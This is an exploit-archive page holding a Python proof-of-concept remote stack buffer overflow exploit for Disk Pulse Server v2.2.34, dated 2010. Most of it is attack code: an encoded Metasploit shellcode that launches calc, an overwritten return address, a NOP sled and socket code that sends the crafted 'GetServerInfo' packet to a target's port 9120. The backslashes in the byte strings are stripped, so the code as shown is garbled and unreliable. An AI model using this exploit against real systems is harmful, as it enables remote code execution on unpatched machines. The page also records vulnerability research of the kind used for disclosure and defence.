Disk Pulse Server v2.2.34 Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Disk Pulse Server v2.2.34 Remote Buffer Overflow Exploit
# Published : 2010-10-12
# Author : xsploited security
# Previous Title : ASP.NET Padding Oracle Vulnerability (MS10-070)
# Next Title : AoA Audio Extractor v2.x ActiveX ROP exploit

#!/usr/bin/python

# Exploit Title: Disk Pulse Server v2.2.34 Remote Buffer Overflow Exploit
# Date: 10/11/2010
# Author: xsploited security
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] gmail.com
# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v2.2.34.exe
# Version: v2.2.34
# Tested on: Windows XP SP3 (Physical machine)
# CVE : N/A

# Vulnerability Information:
# A vulnerability exists in the way Disk Pulse Server v2.2.34 process a remote clients "GetServerInfo" request.
# The vulnerability is caused due to a boundary error in libpal.dll when handling network messages and can be exploited
# to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 9120.

# Other notes:
# It appears the vendor likes using the same server code (that was effected by my previous PoC: http://www.exploit-db.com/exploits/15231)
# for everything client/server related. It is also safe to say that the client(s) are most likely effected by bugs as well.

# Other possibly affected versions:
# Disk Pulse Server <= 1.7.x

# References:
# http://secunia.com/advisories/41748/
# http://www.exploit-db.com/exploits/15231
# http://securityreason.com/exploitalert/9247

# Shouts:
# kAoTiX, MAX, CorelanCoder, exploit-db (of course), all other security crews and sites.

import sys,socket

if len(sys.argv) != 2:
    print "[!] Usage: ./diskpulse.py <Target IP>"
    sys.exit(1)

about = "=================================================n"
about += "Title: Disk Pulse Server v2.2.34 Remote BOF PoCn"
about +=  "Author: xsploited securitynURL: http://www.x-sploited.com/n"
about +=  "Contact: xsploitedsecurity [at] gmail.comn"
about +=  "=================================================n"
print about

host = sys.argv[1]
port = 9120 #default server port

# windows/exec - 218 bytes / http://www.metasploit.com
# Encoder: x86/fnstenv_mov / EXITFUNC=seh, CMD=calc
calc = ("x6ax31x59xd9xeexd9x74x24xf4x5bx81x73x13x97x8c" 
"x8ax10x83xebxfcxe2xf4x6bx64x03x10x97x8cxeax99" 
"x72xbdx58x74x1cxdexbax9bxc5x80x01x42x83x07xf8" 
"x38x98x3bxc0x36xa6x73xbbxd0x3bxb0xebx6cx95xa0" 
"xaaxd1x58x81x8bxd7x75x7cxd8x47x1cxdex9ax9bxd5" 
"xb0x8bxc0x1cxccxf2x95x57xf8xc0x11x47xdcx01x58" 
"x8fx07xd2x30x96x5fx69x2cxdex07xbex9bx96x5axbb" 
"xefxa6x4cx26xd1x58x81x8bxd7xafx6cxffxe4x94xf1" 
"x72x2bxeaxa8xffxf2xcfx07xd2x34x96x5fxecx9bx9b" 
"xc7x01x48x8bx8dx59x9bx93x07x8bxc0x1exc8xaex34" 
"xccxd7xebx49xcdxddx75xf0xcfxd3xd0x9bx85x67x0c" 
"x4dxfdx8dx07x95x2ex8cx8ax10xc7xe4xbbx9bxf8x0b" 
"x75xc5x2cx72x84x22x7dxe4x2cx85x2ax11x75xc5xab" 
"x8axf6x1ax17x77x6ax65x92x37xcdx03xe5xe3xe0x10" 
"xc4x73x5fx73xf6xe0xe9x10");
	
# Begin payload buffer:

packet_header = ("x47x65x74x53x65x72x76x65x72x49x6Ex66x6Fx02");		# ASCII = "GetServerInfo."

junk = "x41" * 256; 			#256 byte junk buffer to reach eip
eip = "xFBxF8xABx71";		#jmp esp (via ws2_32.dll)
nops = "x90" * 12;				#small nop sled

# packet structure:
# [header][junk][eip][nops][shellcode][nops][nops]
packet = packet_header + junk + eip + nops + calc + nops + nops;

print "[*] Connecting to " + host + "...r"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print "[*] Connected, Sending payloadr"
s.send(packet + "rn")
print "[*] Payload sent successfully"
print "[*] Check the resultsr"
s.close()